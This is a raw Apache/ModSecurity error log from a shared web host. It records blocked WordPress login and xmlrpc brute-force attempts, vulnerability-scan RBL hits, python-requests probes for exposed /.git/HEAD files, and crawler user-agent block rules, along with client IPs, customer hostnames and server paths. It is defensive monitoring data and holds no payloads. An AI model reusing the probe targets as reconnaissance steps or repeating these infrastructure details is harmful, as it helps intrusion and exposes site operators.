[Tue May 26 18:10:19.023147 2026] [security2:error] [pid 973439:tid 973631] [client 46.176.156.90:54472] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj9gAAAD4"]
[Tue May 26 18:10:19.023183 2026] [security2:error] [pid 973439:tid 973631] [client 46.176.156.90:54472] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj9gAAAD4"]
[Tue May 26 18:10:19.039995 2026] [security2:error] [pid 973439:tid 973651] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj7gAAAFI"]
[Tue May 26 18:10:19.578879 2026] [security2:error] [pid 973439:tid 973609] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUswBg9mKRpdEFs3BkEAAAACg"]
[Tue May 26 18:10:19.625347 2026] [security2:error] [pid 973439:tid 973533] [remote 88.198.165.116:56200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUswBg9mKRpdEFs3BkCQAAGV0"]
[Tue May 26 18:10:19.758113 2026] [security2:error] [pid 973439:tid 973678] [client 98.159.226.61:63679] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/.git/HEAD"] [unique_id "ahWUswBg9mKRpdEFs3BkFAAAAG0"]
[Tue May 26 18:10:20.020354 2026] [security2:error] [pid 973439:tid 973665] [client 46.176.156.90:54520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkHwAAAGA"]
[Tue May 26 18:10:20.020520 2026] [security2:error] [pid 973439:tid 973665] [client 46.176.156.90:54520] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkHwAAAGA"]
[Tue May 26 18:10:20.020553 2026] [security2:error] [pid 973439:tid 973665] [client 46.176.156.90:54520] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkHwAAAGA"]
[Tue May 26 18:10:20.427381 2026] [security2:error] [pid 973439:tid 973592] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUtABg9mKRpdEFs3BkJQAAABc"]
[Tue May 26 18:10:20.526333 2026] [security2:error] [pid 973439:tid 973669] [client 98.159.226.60:32539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.rabbanitradingcompany.svijaykumar.in"] [uri "/.git/HEAD"] [unique_id "ahWUtABg9mKRpdEFs3BkKgAAAGQ"]
[Tue May 26 18:10:20.724836 2026] [security2:error] [pid 973439:tid 973684] [client 82.76.238.33:61774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUtABg9mKRpdEFs3BkLwAAAHM"]
[Tue May 26 18:10:20.724970 2026] [security2:error] [pid 973439:tid 973684] [client 82.76.238.33:61774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUtABg9mKRpdEFs3BkLwAAAHM"]
[Tue May 26 18:10:20.747860 2026] [security2:error] [pid 973439:tid 973655] [client 121.229.156.84:41412] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/"] [unique_id "ahWUtABg9mKRpdEFs3BkMwAAAFY"]
[Tue May 26 18:10:20.747986 2026] [security2:error] [pid 973439:tid 973655] [client 121.229.156.84:41412] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.xllent.in"] [uri "/"] [unique_id "ahWUtABg9mKRpdEFs3BkMwAAAFY"]
[Tue May 26 18:10:20.902028 2026] [security2:error] [pid 973439:tid 973667] [client 46.176.156.90:54574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkOAAAAGI"]
[Tue May 26 18:10:20.902179 2026] [security2:error] [pid 973439:tid 973667] [client 46.176.156.90:54574] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkOAAAAGI"]
[Tue May 26 18:10:20.902205 2026] [security2:error] [pid 973439:tid 973667] [client 46.176.156.90:54574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtABg9mKRpdEFs3BkOAAAAGI"]
[Tue May 26 18:10:21.312885 2026] [security2:error] [pid 973439:tid 973642] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUtQBg9mKRpdEFs3BkRQAAAEk"]
[Tue May 26 18:10:21.589326 2026] [security2:error] [pid 973439:tid 973616] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUtQBg9mKRpdEFs3BkPAAAAC8"]
[Tue May 26 18:10:21.730391 2026] [security2:error] [pid 973439:tid 973613] [client 46.176.156.90:54638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtQBg9mKRpdEFs3BkTgAAACw"]
[Tue May 26 18:10:21.730542 2026] [security2:error] [pid 973439:tid 973613] [client 46.176.156.90:54638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtQBg9mKRpdEFs3BkTgAAACw"]
[Tue May 26 18:10:21.730570 2026] [security2:error] [pid 973439:tid 973613] [client 46.176.156.90:54638] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtQBg9mKRpdEFs3BkTgAAACw"]
[Tue May 26 18:10:22.000713 2026] [security2:error] [pid 973439:tid 973575] [client 114.119.148.60:23249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousedec/fefead1621216.shtml"] [unique_id "ahWUtgBg9mKRpdEFs3BkUgAAAAY"], referer: http://ghanemgh.com/prespontaneousedec/fefead1621216.shtml
[Tue May 26 18:10:22.144420 2026] [security2:error] [pid 973439:tid 973675] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUtgBg9mKRpdEFs3BkVgAAAGo"]
[Tue May 26 18:10:22.630223 2026] [security2:error] [pid 973439:tid 973600] [client 46.176.156.90:54702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtgBg9mKRpdEFs3BkZAAAAB8"]
[Tue May 26 18:10:22.630355 2026] [security2:error] [pid 973439:tid 973600] [client 46.176.156.90:54702] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtgBg9mKRpdEFs3BkZAAAAB8"]
[Tue May 26 18:10:22.630380 2026] [security2:error] [pid 973439:tid 973600] [client 46.176.156.90:54702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUtgBg9mKRpdEFs3BkZAAAAB8"]
[Tue May 26 18:10:23.477746 2026] [security2:error] [pid 973439:tid 973630] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUtgBg9mKRpdEFs3BkcQAAAD0"]
[Tue May 26 18:10:23.877351 2026] [security2:error] [pid 973439:tid 973518] [remote 178.62.87.212:42974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 212.87.62.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWUtwBg9mKRpdEFs3BkhQAAck4"]
[Tue May 26 18:10:24.041610 2026] [security2:error] [pid 973439:tid 973519] [remote 178.62.87.212:42974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 212.87.62.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWUuABg9mKRpdEFs3BkiwAAT08"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:10:24.395285 2026] [security2:error] [pid 973439:tid 973622] [client 193.37.33.155:51221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWUuABg9mKRpdEFs3BklAAAADU"]
[Tue May 26 18:10:24.693239 2026] [security2:error] [pid 973439:tid 973521] [remote 68.183.88.172:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "kingsclub.in"] [uri "/"] [unique_id "ahWUuABg9mKRpdEFs3BkoQAANFE"]
[Tue May 26 18:10:26.090665 2026] [security2:error] [pid 973439:tid 973620] [client 74.7.241.164:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "stockmarketanalysis.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWUugBg9mKRpdEFs3BkxgAAM2A"]
[Tue May 26 18:10:26.934136 2026] [security2:error] [pid 973439:tid 973571] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUugBg9mKRpdEFs3BkzwAAAAI"]
[Tue May 26 18:10:28.974069 2026] [security2:error] [pid 973439:tid 973641] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUvABg9mKRpdEFs3BlCwAAAEg"]
[Tue May 26 18:10:30.036577 2026] [autoindex:error] [pid 973439:tid 973673] [client 31.220.74.20:53902] AH01276: Cannot serve directory /home1/moesartc/public_html/poonawallatennisacademy.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:10:31.111230 2026] [security2:error] [pid 973439:tid 973570] [client 82.76.238.33:62212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUvwBg9mKRpdEFs3BlUQAAAAE"]
[Tue May 26 18:10:31.111653 2026] [security2:error] [pid 973439:tid 973570] [client 82.76.238.33:62212] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUvwBg9mKRpdEFs3BlUQAAAAE"]
[Tue May 26 18:10:31.487380 2026] [security2:error] [pid 973439:tid 973572] [client 91.107.118.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUvgBg9mKRpdEFs3BlSgAAAAM"]
[Tue May 26 18:10:31.779289 2026] [security2:error] [pid 973439:tid 973641] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUvgBg9mKRpdEFs3BlUAAAAEg"]
[Tue May 26 18:10:33.000512 2026] [autoindex:error] [pid 973439:tid 973579] [client 147.182.149.135:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:10:33.049073 2026] [security2:error] [pid 973439:tid 973559] [remote 163.61.60.30:54884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUwABg9mKRpdEFs3BlfgAAXXc"]
[Tue May 26 18:10:33.136312 2026] [security2:error] [pid 973439:tid 973558] [remote 79.99.41.110:45140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.41.99.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWUwABg9mKRpdEFs3BlfQAADnY"]
[Tue May 26 18:10:34.601384 2026] [security2:error] [pid 973439:tid 973683] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUwgBg9mKRpdEFs3BlowAAAHI"]
[Tue May 26 18:10:37.075053 2026] [security2:error] [pid 973439:tid 973690] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUxABg9mKRpdEFs3Bl1QAAAHk"]
[Tue May 26 18:10:40.158117 2026] [security2:error] [pid 973439:tid 973635] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUxwBg9mKRpdEFs3BmHQAAAEI"]
[Tue May 26 18:10:40.541777 2026] [security2:error] [pid 973439:tid 973565] [remote 192.250.239.252:42874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 252.239.250.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUyABg9mKRpdEFs3BmMAAAen0"]
[Tue May 26 18:10:41.606782 2026] [security2:error] [pid 973439:tid 973466] [remote 192.250.239.252:42874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 252.239.250.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUyQBg9mKRpdEFs3BmTQAAIxo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:10:42.326383 2026] [security2:error] [pid 973439:tid 973630] [client 82.76.238.33:62655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUygBg9mKRpdEFs3BmXwAAAD0"]
[Tue May 26 18:10:42.326516 2026] [security2:error] [pid 973439:tid 973630] [client 82.76.238.33:62655] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUygBg9mKRpdEFs3BmXwAAAD0"]
[Tue May 26 18:10:42.406210 2026] [security2:error] [pid 973439:tid 973653] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUyQBg9mKRpdEFs3BmVwAAAFQ"]
[Tue May 26 18:10:43.763598 2026] [security2:error] [pid 973439:tid 973464] [remote 196.188.249.61:34066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUywBg9mKRpdEFs3BmgQAARRg"]
[Tue May 26 18:10:44.985029 2026] [security2:error] [pid 973439:tid 973630] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUzABg9mKRpdEFs3BmmgAAAD0"]
[Tue May 26 18:10:45.643832 2026] [security2:error] [pid 973439:tid 973477] [remote 196.188.249.61:34066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUzQBg9mKRpdEFs3BmuQAARyU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:10:47.461415 2026] [security2:error] [pid 973439:tid 973652] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUzwBg9mKRpdEFs3Bm1gAAAFM"]
[Tue May 26 18:10:50.167720 2026] [security2:error] [pid 973439:tid 973643] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWU0QBg9mKRpdEFs3BnGgAAAEo"]
[Tue May 26 18:10:50.279741 2026] [security2:error] [pid 973439:tid 973570] [client 185.191.171.2:55286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/2026-04-01/"] [unique_id "ahWU0gBg9mKRpdEFs3BnJwAAAAE"]
[Tue May 26 18:10:50.279874 2026] [security2:error] [pid 973439:tid 973570] [client 185.191.171.2:55286] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/2026-04-01/"] [unique_id "ahWU0gBg9mKRpdEFs3BnJwAAAAE"]
[Tue May 26 18:10:51.294863 2026] [security2:error] [pid 973439:tid 973656] [client 74.7.230.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.taotechservices.com"] [uri "/index.php"] [unique_id "ahWU0gBg9mKRpdEFs3BnMAAAAFc"]
[Tue May 26 18:10:51.294888 2026] [security2:error] [pid 973439:tid 973656] [client 74.7.230.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.taotechservices.com"] [uri "/index.php"] [unique_id "ahWU0gBg9mKRpdEFs3BnMAAAAFc"]
[Tue May 26 18:10:51.295920 2026] [security2:error] [pid 973439:tid 973642] [client 74.7.230.59:39290] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWU0gBg9mKRpdEFs3BnLgAASTk"]
[Tue May 26 18:10:51.583710 2026] [security2:error] [pid 973439:tid 973652] [client 74.7.230.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "taotechservices.com"] [uri "/index.php"] [unique_id "ahWU0wBg9mKRpdEFs3BnTQAAAFM"], referer: https://www.taotechservices.com/robots.txt
